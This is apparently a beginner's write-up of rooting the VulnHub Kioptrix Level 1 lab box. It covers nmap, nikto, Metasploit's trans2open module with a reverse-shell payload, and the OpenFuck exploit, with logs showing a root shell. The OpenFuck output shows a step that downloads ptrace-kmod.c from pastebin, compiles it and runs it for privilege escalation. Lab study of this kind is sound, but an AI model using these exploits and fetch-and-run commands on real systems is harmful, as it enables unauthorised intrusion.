In this post I'm going to go over my experience working the Kioptrix Level 1 beginners box from VulnHub. This is essentially a write up and a set of study notes in one piece.
This post is based on my learning experience with Heath Adams' course, Practical Ethical Hacking. I followed all of Adams' steps and instructions so that I could learn his methodology and learn about tools I never even knew existed (because, you know, I've been at this for five minutes).
Installing the VM was a pain in the arse but luckily the TCMSec team had me covered by having a working copy of the system in question. I won't post a link here as I'm unsure if I'm allowed to.
Breaking it down
Here are the steps taken:
- nmap scan of the host to discover possible entry points
- Hitting ports 80 and 443 in the browser to see what comes back
- nikto to scan the website for possible vulnerabilities
- dirbuster to find sub-directories and possibly sensitive files like backups and credentials
- Do some manual searches to find exploits
- Execute Nessus to get some confirmation on found exploits
- Use Metasploit Framework to root (pop) the system
- Use OpenFuck (spoiler alert!) to manually pop the system
The Scan -
Here is an initial scan of the system. I used this command:
nmap -T4 -p- -A $IP
This can be broken down as such:
- -T4 - the timing template, i.e. how aggressively nmap scans the target. The flag accepts a scale from 0 (paranoid) to 5 (insane); 4 is the usual choice on a lab network where nobody minds the noise.
- -p- - the ports to scan. -p- essentially means: everything, all 65535 TCP ports rather than the default top 1000. That is how port 32768 below turned up at all.
- -A - the "aggressive" option. It turns on OS detection, version detection, default NSE script scanning and traceroute against whatever ports are found open. The Apache and Samba version strings relied on later come from this.

Adams points out that using -sS for stealth isn't a thing anymore. It's an old-school method of scanning a remote host without being detected: the s means scan type and the S means SYN, and older docs call it the "stealth" or "half-open" scan. It works by sending a TCP SYN, waiting for a TCP SYN/ACK (port open) or RST (port closed), and then, instead of sending the final TCP ACK that would complete the handshake, sending a TCP RST to tear the half-open connection down so the target's application layer never sees a connection.

The flag itself is far from dead: -sS is still nmap's default scan type when run as root (without root it falls back to the full-connect -sT). What is outdated is the idea that a half-open scan goes unnoticed; any modern IDS, and even a firewall log, flags a burst of SYNs with no completed handshakes.
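To make the half-open exchange concrete, here is an added example (not from nmap, the course or the original write-up) that builds and checksums raw TCP segments, classifies the target's first reply the way a SYN scanner does, and, if run as root against a host you are allowed to scan, performs the SYN / SYN-ACK / RST probe for real. The offline parts run on constructed segments; the 10.0.2.x addresses, ports and sequence numbers are placeholders.

```python
"""The half-open (SYN) probe behind nmap -sS, built from raw TCP headers.

Added example for this write-up; not from nmap, the course or the original
post. Building, checksumming and classifying segments runs offline on
constructed data. syn_probe() sends real packets and needs CAP_NET_RAW (root)
and a host you are allowed to scan; the 10.0.2.x addresses are placeholders.
"""
import socket
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10
TCP_HDR = "!HHIIBBHHH"  # sport, dport, seq, ack, offset/reserved, flags, window, checksum, urgent


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd length zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                              # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    """TCP checksums also cover this IPv4 pseudo-header."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len))


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, window=1024) -> bytes:
    """Return a 20-byte TCP header (no options, no payload) with a valid checksum."""
    hdr = struct.pack(TCP_HDR, sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    csum = checksum(_pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def verify_checksum(src_ip, dst_ip, segment: bytes) -> bool:
    """Summing a correctly checksummed segment (plus pseudo-header) yields zero."""
    return checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def parse_tcp(segment: bytes) -> dict:
    sport, dport, seq, ack, _off, flags, window, csum, _urg = struct.unpack(TCP_HDR, segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "window": window, "checksum": csum}


def classify_reply(segment: bytes) -> str:
    """What a SYN scanner concludes from the first segment the target sends back."""
    flags = parse_tcp(segment)["flags"]
    if flags & (SYN | ACK) == SYN | ACK:
        return "open"        # target is mid-handshake, waiting for our ACK
    if flags & RST:
        return "closed"      # nothing listening; the stack refused outright
    return "unexpected"


def syn_probe(src_ip: str, dst_ip: str, dport: int, sport: int = 40000, timeout: float = 2.0) -> str:
    """Send SYN, read the reply, and answer a SYN/ACK with RST instead of ACK.

    Needs root. Linux will itself RST the SYN/ACK because no socket owns
    sport; the explicit RST here mirrors what the scanner logic does.
    """
    raw = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
    raw.settimeout(timeout)
    seq = 0x12345678
    try:
        raw.sendto(build_tcp(src_ip, dst_ip, sport, dport, seq, 0, SYN), (dst_ip, 0))
        while True:
            pkt, _ = raw.recvfrom(65535)
            ihl = (pkt[0] & 0x0F) * 4               # kernel hands us the IPv4 header too
            if len(pkt) < ihl + 20:
                continue
            reply = parse_tcp(pkt[ihl:])
            if reply["sport"] == dport and reply["dport"] == sport:
                break
        verdict = classify_reply(pkt[ihl:])
        if verdict == "open":
            # The "half-open" part: tear down instead of completing the handshake.
            raw.sendto(build_tcp(src_ip, dst_ip, sport, dport, seq + 1, reply["seq"] + 1, RST | ACK), (dst_ip, 0))
        return verdict
    except socket.timeout:
        return "filtered"                           # no answer: dropped by a filter somewhere
    finally:
        raw.close()


if __name__ == "__main__":
    # Offline walk-through of the exchange with constructed segments.
    syn = build_tcp("10.0.2.15", "10.0.2.10", 40000, 139, 1, 0, SYN)
    synack = build_tcp("10.0.2.10", "10.0.2.15", 139, 40000, 9000, 2, SYN | ACK)
    print("SYN checksum valid:", verify_checksum("10.0.2.15", "10.0.2.10", syn))
    print("reply classified as:", classify_reply(synack))
```

Running it as root with `syn_probe("10.0.2.15", "10.0.2.10", 139)` against the lab box is the one-port equivalent of `nmap -sS -p139`; the "filtered" branch is why nmap distinguishes closed (RST received) from filtered (silence), a difference the write-up's later enumeration depends on.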
So the results of the scan for me turned out like this:
So what did we find?
- Port 443 suggesting a website or websites are present;
- Port 139 suggesting an SMB share is being hosted here;
- Port 22 - nothing surprising here except at this point it tells us we're dealing with Linux (guaranteed with this box given it was built in 2011, if not earlier, and OpenSSH wasn't available natively in Windows Server at that point);
- And port 32768, which nmap labels as IBM FileNet. I've never heard of this before today. That label is only nmap looking the port number up in its services table, not a fingerprint, so treat it as a guess until version detection shows what is actually listening; on Linux of that era 32768 is also the start of the ephemeral port range, so it is frequently just a dynamically bound RPC service.
Let's move onto enumerating the system further, starting with the web server on ports 80 and 443.
Nikto, a great little tool, was invoked as such:
nikto -h http://$IP/
And the results were fascinating:
$ nikto -h http://10.0.2.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.10
+ Target Hostname:    10.0.2.10
+ Target Port:        80
+ Start Time:         2021-04-20 19:58:26 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 13:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8707 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2021-04-20 20:00:08 (GMT10) (102 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Do note that nikto is considered "loud" and not always a good choice: it fired 8707 requests at the host in under two minutes here, every one of them sitting in the web server's access log. Also bear in mind that nikto matches signatures rather than confirming anything. Several of the hits above (the WordPress "PHP backdoor" paths, the D-Link login.cgi, /shell) are implausible on a 2001-era Red Hat Apache with no other sign of WordPress or a router firmware, and even the "///etc/hosts" read needs checking by requesting the URL and looking at what actually comes back, not just whether the status was 200. The real signal in this output is the version banner: Apache 1.3.20, mod_ssl 2.8.4 and OpenSSL 0.9.6b, plus the TRACE method being enabled.
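Here is what that manual check looks like in code, as an added example (not part of nikto, the course or the original write-up). It requests each of the "file read" paths nikto reported above and grades the response on its body rather than its status code, so a server that answers 200 to everything is told apart from one that really returns /etc/hosts. Because it has to run offline, the target is a constructed local mock that can be switched between those two behaviours; the hosts-file content and the 127.0.0.1 target are constructed, and nothing here claims how the actual Kioptrix Apache responds.

```python
"""Confirm or dismiss nikto 'file read' / 'backdoor' hits by inspecting bodies.

Added example for this write-up (not from nikto, the course or the original
post). The target is a constructed local mock; the candidate paths are lifted
from the nikto output above, and the hosts-file content is made up.
"""
import http.client
import re
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Paths nikto reported; every one is a claim that a GET returns /etc/hosts.
CANDIDATE_PATHS = [
    "///etc/hosts",
    "/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts",
    "/login.cgi?cli=aa%20aa%27cat%20/etc/hosts",
    "/shell?cat+/etc/hosts",
]

# Constructed content for the mock; not taken from the box.
FAKE_HOSTS = b"127.0.0.1\tlocalhost.localdomain localhost\n10.0.2.10\tkioptrix.level1 kioptrix\n"
FAKE_INDEX = b"<html><body><h1>Test Page for the Apache Web Server</h1></body></html>"

HOSTS_LINE = re.compile(r"^\s*\d{1,3}(?:\.\d{1,3}){3}\s+\S+", re.M)  # an IPv4 hosts(5) entry


def looks_like_hosts_file(body: bytes) -> bool:
    """The check nikto only implies: does the body actually read like /etc/hosts?"""
    text = body.decode("latin-1", "replace")
    return bool(HOSTS_LINE.search(text)) and "localhost" in text


def verdict(status: int, body: bytes) -> str:
    if status != 200:
        return "no_hit"
    if looks_like_hosts_file(body):
        return "confirmed_file_read"
    return "status_only_false_positive"   # 200 with unrelated content: a catch-all page


def triage(host: str, port: int, paths=CANDIDATE_PATHS, timeout: float = 5.0) -> dict:
    """GET each candidate path and grade the response body, not the status code."""
    results = {}
    for path in paths:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path, headers={"User-Agent": "triage/0.1"})
            resp = conn.getresponse()
            results[path] = verdict(resp.status, resp.read())
        finally:
            conn.close()
    return results


class MockApache(BaseHTTPRequestHandler):
    """Constructed stand-in: answers 200 to everything; optionally leaks the hosts file."""
    leak_hosts = False

    def do_GET(self):
        leaking = self.leak_hosts and "etc/hosts" in self.path
        body = FAKE_HOSTS if leaking else FAKE_INDEX
        self.send_response(200)
        self.send_header("Content-Type", "text/plain" if leaking else "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):      # keep the mock quiet
        pass


def run_against_mock(leak_hosts: bool) -> dict:
    """Spin up the mock on a free loopback port, triage it, shut it down."""
    handler = type("Handler", (MockApache,), {"leak_hosts": leak_hosts})
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return triage("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for leak in (False, True):
        print("leaky mock:" if leak else "catch-all mock:", run_against_mock(leak))
```

Pointing `triage()` at the real box instead of the mock is the whole exercise: anything graded `status_only_false_positive` is nikto reacting to a permissive server, and only `confirmed_file_read` belongs in the findings.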
A nifty little tool, DirBuster was able to find a tonne of stuff such as Webalizer metrics/logs/visualisations and a testing PHP page.
I decided not to explore too much of this stuff except for the items Heath goes over in his course in the interest of time.
Manual Exploit Discovery
Before going into automatic exploit discovery, like Nessus (below), Heath teaches and encourages the student to Google around for exploits. Here is what I found.
These are the primary entry points. There are possibly others, perhaps via Webalizer, but I haven't trained in web exploitation yet, so I'm keeping this simple.
In Heath's course we cover Nessus and run it against the Kioptrix 1 VM. Here is a screengrab of my results:
It's safe to say this box has a few issues. Here's a screenshot showing the critical issues discovered:
So Nessus found a lot wrong with the system. Far more than we did manually searching for things.
Metasploit Framework - Getting root
Once we know what kind of options we have available to us we can search for exploits in MSF. For the Samba service, I (and Nessus) found something called trans2open. MSF has modules for this across multiple operating systems:
msf6 > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)
So we have four versions of the same exploit, one per target platform, and need the one that matches the host.
We know from our scans that we're dealing with a Red Hat Linux host:
http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
which we got from our nmap output. A banner is not guaranteed to be accurate, but given we found sshd on port 22 and detected Apache carrying the Red-Hat/Linux build string, it's very likely to be a Linux system, so exploit/linux/samba/trans2open is the one to use.
To exploit the system we "load" the module:
msf6 > use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Notice the information re: "no payload configured". The default payload is staged: Metasploit sends a small stager first, which connects back and pulls the rest of the payload (here, Meterpreter) over the wire. That second stage then has to run on the target, and on a 2001-era box it frequently doesn't. I tried the default and it failed.
Changing the payload is simple enough. Here's a list of available options (this is a screenshot due to the width/size of the output):
Because I tried the staged payload and it didn't work, I should now find and use a non-staged payload. The option we want is:
linux/x86/shell_reverse_tcp
Knowing why this option is non-staged is covered by Heath, but the short version is Metasploit's naming convention: an underscore between the shell and the transport (shell_reverse_tcp) marks a single, self-contained payload, while a slash (shell/reverse_tcp) marks a staged one whose stager fetches the rest after connecting back. A single payload carries the whole reverse shell in the first send, so nothing further has to work on the old target.
After finding the correct module to load and setting a working payload, we set the remote host (RHOSTS) and run exploit. The module tries a handful of candidate return addresses in turn until one lands, which is why several "Trying return address" lines appear before the session opens:
msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 10.0.2.10:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.10:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.10:32769) at 2021-04-26 15:28:12 +1000

whoami
root
hostname
kioptrix.level1
Manual Exploitation: OpenFuck
Although Metasploit Framework is used a lot in the real world, a lot of certifications, such as the OSCP, want you to manually exploit systems so that you can demonstrate an understanding of what the f- is going on.
While Googling for exploits against the service versions found I discovered OpenFuck. Note that it targets the web server, not Samba 2.2.1a: as its banner says it is based on openssl-too-open, and it exploits a buffer overflow in the SSLv2 handshake of OpenSSL 0.9.6b behind mod_ssl 2.8.4 on port 443, i.e. the outdated mod_ssl/OpenSSL pair nikto flagged above.
It's a piece of C code that I am yet to fully understand, but I appreciate what it's doing. The steps to use this little gem are relatively simple:
- Compile the file, linking against OpenSSL's libcrypto (on Kali that means having libssl-dev installed):
gcc -o OpenFuck OpenFuck.c -lcrypto
- Execute, providing the right flags:
./OpenFuck 0x6b 10.0.2.10 -c 40
0x6b selects the target, if you like: an entry in the exploit's built-in table of Apache/distro builds (printed if you run it with no arguments), each carrying the offsets for that specific binary, so it has to match the Red Hat apache-1.3.20 build found here. -c 40 sets the number of connections the exploit opens to the server before sending the shellcode, to get the target process into a state where those hard-coded offsets are more likely to line up. I won't pretend to understand what the latter means.
Here's the entire output:
┌──(kali㉿kali)-[~/git/kioptrix_1/OpenLuck]
└─$ ./OpenFuck 0x6b 10.0.2.10 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80a8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt
--15:39:24--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

15:39:25 (3.84 MB/s) - `ptrace-kmod.c' saved

ptrace-kmod.c:183:1: warning: no newline at end of file
/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
whoami
root
hostname
kioptrix.level1

A few things worth noticing in that output. First, OpenFuck on its own only lands a shell as the web server's unprivileged user (the bash-2.05$ prompt). Root comes from the second step the exploit runs automatically once it has a shell: the wget / gcc / ./p sequence echoed after the prompt fetches ptrace-kmod.c, the ptrace/kmod local root exploit for Linux 2.4 kernels, compiles it on the box and runs it. So the "manual" exploit is really two exploits chained, remote code execution followed by local privilege escalation. Second, that command pulls code from pastebin.com onto the target and executes it sight unseen; on a real engagement, read the source first and serve it from your own host rather than trusting whatever a public paste happens to contain today. Third, the ld error: the directory the shell landed in wasn't writable, so the compile of p failed on this run even though whoami still came back root. If the escalation doesn't fire for you, compile ptrace-kmod.c by hand from a writable directory such as /tmp.